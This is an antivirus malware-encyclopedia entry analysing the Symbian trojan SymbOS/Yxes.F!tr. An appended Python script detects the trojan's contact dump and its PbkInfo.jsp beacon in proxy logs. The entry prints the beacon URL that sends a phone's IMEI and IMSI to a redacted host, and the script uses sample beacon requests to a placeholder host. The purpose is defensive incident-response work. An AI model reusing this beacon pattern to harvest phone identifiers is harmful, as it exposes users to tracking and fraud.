SymbOS/Yxes.F!tr

Release Date: Jul 16, 2009

Detection Availability
               Active Database   Extended Database
  FortiGate    low               high
  FortiClient
  FortiMail    N/A

Current Antivirus Definition Database Version: 12.202
Description

Visible Symptoms

  • abnormally high phone bill
  • presence of the file c:\system\data\pbk.info

Detailed Analysis

SymbOS/Yxes.F!tr is a variant of the SymbOS/Yxes.E!worm worm. It gathers the contacts stored on the mobile phone and attempts to post information such as the phone's IMEI and IMSI to malicious web sites.

This malware belongs to the SymbOS/Yxes family and is typically downloaded from the malicious websites that other SymbOS/Yxes variants silently contact.
Like other SymbOS/Yxes variants, the malware installs without any problem on Symbian OS 9 (or later) phones, since it carries a valid X.509 certificate issued by Symbian.
The malware creates a semaphore named PbkPatchSemaphore_0x20026CAB to make sure that only a single instance is running.
It then dumps all contacts stored in the phone, in vCard 2.1 format, to a file named c:\system\data\pbk.info. For example (phone number redacted):
00000000  42 45 47 49 4e 3a 56 43  41 52 44 0d 0a 56 45 52  |BEGIN:VCARD..VER|
00000010  53 49 4f 4e 3a 32 2e 31  0d 0a 52 45 56 3a 32 30  |SION:2.1..REV:20|
00000020  30 39 30 37 31 33 54 30  38 33 33 30 39 5a 0d 0a  |090713T083309Z..|
00000030  4e 3a 4e 6f 20 64 61 74  61 3b 41 76 20 6c 61 62  |N:No data;Av lab|
00000040  3b 3b 3b 0d 0a 54 45 4c  3b 43 45 4c 4c 3a 30 36  |;;;..TEL;CELL:06|
00000050  xx xx xx xx xx xx xx xx  0d 0a 58 2d 43 4c 41 53  |--------..X-CLAS|
00000060  53 3a 70 72 69 76 61 74  65 0d 0a 45 4e 44 3a 56  |S:private..END:V|
00000070  43 41 52 44 0d 0a                                 |CARD..|

Like other variants of SymbOS/Yxes, this malware attempts to issue an HTTP request to a malicious website, passing the phone's IMEI and IMSI as URL parameters:
hxxp://[REMOVED]/PbkInfo.jsp?PhoneType=phonetype&PhoneImei=IMEI&PhoneImsi=IMSI

In this URL, PhoneType is a string identifying the phone's model, for example nokiaN95; PhoneImei is a sequence of digits corresponding to the victim's IMEI (the handset identifier); PhoneImsi is a sequence of digits corresponding to the victim's IMSI (the SIM subscriber identifier).

Depending on the phone's model, its settings and the sample, there are cases where the HTTP request fails to be sent and the malware crashes. In that case, no external communication takes place.
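As an added illustration for incident responders (this is not code from the original Fortinet entry), the following Python script does the two checks the analysis above suggests: it parses the vCard 2.1 records the malware writes to pbk.info, and it scans HTTP proxy log lines for the PbkInfo.jsp beacon, extracting PhoneType, PhoneImei and PhoneImsi and sanity-checking the IMEI with the Luhn check digit that a genuine 15-digit IMEI carries. The file content, log lines, host name and IMEI/IMSI values are constructed for the example; the real malicious host is redacted on this page and example.invalid does not stand in for it.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample mirroring the vCard 2.1 layout of c:\system\data\pbk.info
# shown in the hex dump above (the phone number is made up).
SAMPLE_PBK_INFO = (
    "BEGIN:VCARD\r\nVERSION:2.1\r\nREV:20090713T083309Z\r\n"
    "N:No data;Av lab;;;\r\nTEL;CELL:0612345678\r\n"
    "X-CLASS:private\r\nEND:VCARD\r\n"
)

# Constructed proxy log lines (not real traffic; example.invalid is a placeholder
# for the redacted C2 host). Format: date time client method url status
SAMPLE_LOG = """\
2009-07-13 08:33:10 10.0.0.5 GET http://example.invalid/PbkInfo.jsp?PhoneType=nokiaN95&PhoneImei=490154203237518&PhoneImsi=310150123456789 200
2009-07-13 08:33:12 10.0.0.6 GET http://example.invalid/index.html 200
2009-07-13 08:33:15 10.0.0.7 GET http://example.invalid/PbkInfo.jsp?PhoneType=nokiaN95&PhoneImei=notanumber&PhoneImsi=123 200
"""


def parse_pbk_info(text):
    """Parse the contact dump into a list of dicts (family, given, tel, cls)."""
    contacts = []
    current = None
    for line in text.splitlines():
        line = line.strip()
        if line == "BEGIN:VCARD":
            current = {}
        elif line == "END:VCARD":
            if current is not None:
                contacts.append(current)
            current = None
        elif current is not None and ":" in line:
            key, value = line.split(":", 1)
            prop = key.split(";", 1)[0].upper()  # "TEL;CELL" -> "TEL"
            if prop == "N":
                # vCard N is Family;Given;Additional;Prefix;Suffix
                parts = value.split(";")
                current["family"] = parts[0]
                current["given"] = parts[1] if len(parts) > 1 else ""
            elif prop == "TEL":
                current["tel"] = value
            elif prop == "X-CLASS":
                current["cls"] = value
    return contacts


def luhn_ok(digits):
    """Luhn check: the 15th digit of a genuine IMEI is a Luhn check digit."""
    if not digits.isdigit():
        return False
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


YXES_PARAMS = {"PhoneType", "PhoneImei", "PhoneImsi"}
URL_RE = re.compile(r"\bhttps?://\S+", re.IGNORECASE)


def classify_request(url):
    """Return a finding dict if url looks like a Yxes PbkInfo.jsp beacon, else None.

    The match is on path and parameter names, not on the host, because the host
    is redacted on the Fortinet page and may differ between samples.
    """
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/pbkinfo.jsp"):
        return None
    qs = parse_qs(parts.query)
    if not YXES_PARAMS.issubset(qs):
        return None
    imei, imsi = qs["PhoneImei"][0], qs["PhoneImsi"][0]
    return {
        "host": parts.hostname,
        "phone_type": qs["PhoneType"][0],
        "imei": imei,
        "imsi": imsi,
        # A well-formed IMEI is 15 digits passing Luhn; an IMSI is 14 or 15
        # digits in practice (3-digit MCC, 2- or 3-digit MNC, up to 10-digit MSIN).
        "imei_plausible": len(imei) == 15 and luhn_ok(imei),
        "imsi_plausible": imsi.isdigit() and 14 <= len(imsi) <= 15,
    }


def scan_log(log_text):
    """Run classify_request over every URL in the log; return the beacons found."""
    findings = []
    for line in log_text.splitlines():
        m = URL_RE.search(line)
        if not m:
            continue
        finding = classify_request(m.group(0))
        if finding:
            finding["client"] = line.split()[2]
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for c in parse_pbk_info(SAMPLE_PBK_INFO):
        print("dumped contact:", c)
    for f in scan_log(SAMPLE_LOG):
        print("Yxes beacon from", f["client"], f)
```

The third log line shows why the plausibility flags are worth keeping: a request with the right path and parameter names but garbage identifiers is still a hit (the parameter set is the signature), but the flags tell the analyst at a glance whether a real handset and SIM were actually exposed.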

There are three major differences from other Yxes variants:
  1. This version does not send any SMS; it only attempts to make HTTP connections.
  2. This version does not read the SMS inbox folder.
  3. This version neither writes nor propagates a malicious .sisx file.

Description Last Updated Date: Aug 28, 2009
Reference: ID - 940685